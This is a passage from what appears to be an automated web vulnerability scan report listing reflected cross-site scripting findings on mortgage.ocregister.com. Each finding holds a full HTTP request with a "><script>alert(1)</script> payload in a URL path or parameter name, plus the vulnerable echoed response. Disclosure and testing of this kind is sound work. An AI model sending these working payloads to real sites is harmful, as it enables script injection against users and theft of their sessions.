Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010cb8f1\"><script>alert(1)</script>d0a62076da8/11/feed/" />
...[SNIP]...

1.349. http://mortgage.ocregister.com/2010/11/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b677c"><script>alert(1)</script>be838dc77bd was submitted in the REST URL parameter 2. This input was echoed as b677c\"><script>alert(1)</script>be838dc77bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11b677c"><script>alert(1)</script>be838dc77bd/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:17 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11b677c\"><script>alert(1)</script>be838dc77bd/feed/" />
...[SNIP]...

1.350. http://mortgage.ocregister.com/2010/11/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/11/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb71"><script>alert(1)</script>e8fe4cf5fe1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fbb71\"><script>alert(1)</script>e8fe4cf5fe1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/?fbb71"><script>alert(1)</script>e8fe4cf5fe1=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 November - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/11/?fbb71\"><script>alert(1)</script>e8fe4cf5fe1=1feed/" />
...[SNIP]...

1.351. http://mortgage.ocregister.com/2010/12/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe7d"><script>alert(1)</script>9448cd28c6b was submitted in the REST URL parameter 1. This input was echoed as dbe7d\"><script>alert(1)</script>9448cd28c6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010dbe7d"><script>alert(1)</script>9448cd28c6b/12/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:33 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010dbe7d\"><script>alert(1)</script>9448cd28c6b/12/feed/" />
...[SNIP]...

1.352. http://mortgage.ocregister.com/2010/12/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf92"><script>alert(1)</script>76f411482be was submitted in the REST URL parameter 2. This input was echoed as bbf92\"><script>alert(1)</script>76f411482be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/12bbf92"><script>alert(1)</script>76f411482be/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12bbf92\"><script>alert(1)</script>76f411482be/feed/" />
...[SNIP]...

1.353. http://mortgage.ocregister.com/2010/12/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2010/12/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a315"><script>alert(1)</script>fc303a44594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a315\"><script>alert(1)</script>fc303a44594 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/12/?3a315"><script>alert(1)</script>fc303a44594=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:12:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 116006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2010 December - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2010/12/?3a315\"><script>alert(1)</script>fc303a44594=1feed/" />
...[SNIP]...

1.354. http://mortgage.ocregister.com/2011/01/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4cbf"><script>alert(1)</script>bf63c84bd54 was submitted in the REST URL parameter 1. This input was echoed as d4cbf\"><script>alert(1)</script>bf63c84bd54 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011d4cbf"><script>alert(1)</script>bf63c84bd54/01/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62655

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011d4cbf\"><script>alert(1)</script>bf63c84bd54/01/feed/" />
...[SNIP]...

1.355. http://mortgage.ocregister.com/2011/01/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6eafb"><script>alert(1)</script>e74c7ede1c7 was submitted in the REST URL parameter 2. This input was echoed as 6eafb\"><script>alert(1)</script>e74c7ede1c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/016eafb"><script>alert(1)</script>e74c7ede1c7/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:12:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:12:03 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/016eafb\"><script>alert(1)</script>e74c7ede1c7/feed/" />
...[SNIP]...

1.356. http://mortgage.ocregister.com/2011/01/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6821d"><script>alert(1)</script>a9bdec31fc9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6821d\"><script>alert(1)</script>a9bdec31fc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/?6821d"><script>alert(1)</script>a9bdec31fc9=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:11:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 100078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" 2011 January - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/?6821d\"><script>alert(1)</script>a9bdec31fc9=1feed/" />
...[SNIP]...

1.357. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf68d"><script>alert(1)</script>b4fa67ceb86 was submitted in the REST URL parameter 5. This input was echoed as cf68d\"><script>alert(1)</script>b4fa67ceb86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d"><script>alert(1)</script>b4fa67ceb86/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:10:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:10:02 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
nk rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162cf68d\"><script>alert(1)</script>b4fa67ceb86/feed/" />
...[SNIP]...

1.358. http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/08/upside-down-but-still-on-a-good-path/41162/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a165b"><script>alert(1)</script>757581a972c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a165b\"><script>alert(1)</script>757581a972c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b"><script>alert(1)</script>757581a972c=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41162>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77227


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
"application/rss+xml" title=" Upside down but still on a good path - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/08/upside-down-but-still-on-a-good-path/41162/?a165b\"><script>alert(1)</script>757581a972c=1feed/" />
...[SNIP]...

1.359. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2896b"><script>alert(1)</script>20b18d9fc89 was submitted in the REST URL parameter 5. This input was echoed as 2896b\"><script>alert(1)</script>20b18d9fc89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/413342896b"><script>alert(1)</script>20b18d9fc89/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:57 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/413342896b\"><script>alert(1)</script>20b18d9fc89/feed/" />
...[SNIP]...

1.360. http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/13/late-o-c-mortgage-payments-drop/41334/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30dce"><script>alert(1)</script>046932d1455 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30dce\"><script>alert(1)</script>046932d1455 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce"><script>alert(1)</script>046932d1455=1 HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:09:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Link: <http://mortgage.ocregister.com/?p=41334>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 74370


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
te" type="application/rss+xml" title=" Late O.C. mortgage payments drop - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/13/late-o-c-mortgage-payments-drop/41334/?30dce\"><script>alert(1)</script>046932d1455=1feed/" />
...[SNIP]...

1.361. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mortgage.ocregister.com
Path:   /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18630"><script>alert(1)</script>df0e4fbd4ac was submitted in the REST URL parameter 5. This input was echoed as 18630\"><script>alert(1)</script>df0e4fbd4ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630"><script>alert(1)</script>df0e4fbd4ac/ HTTP/1.1
Host: mortgage.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296972000168%26vn%3D1; 44146092a8373b49c062f68d9825aa14=1; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; Axxd=1; DMUserTrack=76DB7C80-A3AF-45F2-82C2-8381798839F3'; sinvisit_m=true; AxData=; s_cc=true; s_lastvisit=1296750717165; s_nr=1296750723302; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1298959200170%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:09:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://mortgage.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:09:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
rnate" type="application/rss+xml" title=" Page not found - Mortgage Insider - www.ocregister.com" href="http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/4134018630\"><script>alert(1)</script>df0e4fbd4ac/feed/" />
...[SNIP]...

1.362. http://mortgage.ocregister.com/2011/01/14/ca-foreclosure-starts-fall-but-more-auctions-set/41340/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
